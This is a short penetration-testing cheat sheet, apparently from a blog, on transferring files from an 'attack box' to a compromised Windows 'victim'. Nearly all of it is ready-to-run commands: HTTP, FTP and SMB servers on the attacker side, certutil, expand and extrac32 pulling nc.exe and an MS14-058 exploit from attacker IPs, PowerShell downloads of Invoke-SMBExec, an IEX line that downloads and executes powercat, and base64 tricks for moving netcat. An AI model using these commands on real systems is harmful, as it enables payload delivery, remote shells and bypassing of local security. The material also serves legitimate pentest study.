Transfer files – Windows
Several methods is described here, on how to transfer files between Windows system as victim and attack box.
Start HTTP Server on Attack box
Start HTTP Server vi Py module
1 2 |
python -m SimpleHTTPServer 80 |
Start FTP Server on Attack box
Start FTP via PyFTP Lib
1 2 3 |
#Install pyFTP lib apt-get install python-pyftpdlib |
1 2 |
python -m pyftpdlib -p 2121 |
1 2 3 |
# -w to allow anon write access!! python -m pyftpdlib -w -p 2121 |
Start SMB Server on Attack box
Start SMB Service via Impacket From Impacket modules:
https://github.com/CoreSecurity/impacket
To launch a simple SMB server on port 445, just specify a share name and the path you want to share:
1 2 |
python smbserver.py TMP /root/shells |
The python script takes care of all the configurations for you, binds to 445, and accepts any authentication. It will even print out the hashed challenge responses for any system that connects to it.
certutil
1 2 |
certutil -urlcache -split -f "http://10.10.xx.xx:8000/nc.exe" "C:\Users\security\tmp\nc.exe" |
expand
Start SMB share on Kali via Impacket python :
From victim run :
1 2 |
expand \\kali-ip\TMP\file.exe . |
Note. low priv user typically has write access to C:\Windows\Tasks or Temp.
extrac32
1 2 |
extrac32 /Y /C \\10.11.xx.xxx\TMP\MS14-058.exe C:\Windows\Temp\MS14058.exe |
Powershell
1 2 3 4 |
(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.7:8000/Invoke-SMBExec.ps1", "C:\Users\Administrator\test2\Invoke-SMBExec.ps1") Invoke-WebRequest "http://10.10.14.7:8000/Invoke-SMBExec.ps1" -OutFile "C:\Users\security\tmp\Invoke-SMBExec.ps1" |
Powershell Download and Execute
1 2 |
IEX (New-Object System.Net.Webclient).DownloadString(‘http://10.10.xx.xx/powercat.ps1') |
Base64
Examples.
1 2 3 |
cat ncat | base64 -w 0 echo -n (paste) | base64 -d > ncat |
1 2 3 |
cat /bin/nc | base64 -w 0 > nc.b64 cat nc.b64 | base64 -d > nc |
md5 check file integrity after transfer.
md5sum /bin/nc
7a32c9739cc63ed983ae01af2577c01c /bin/nc
chmod +x nc
1 2 |
md5sum nc |
7a32c9739cc63ed983ae01af2577c01c nc
Check https://lolbas-project.github.io/for legitimate native windows binaries that be exploited by attacker to bypass local security restrictions.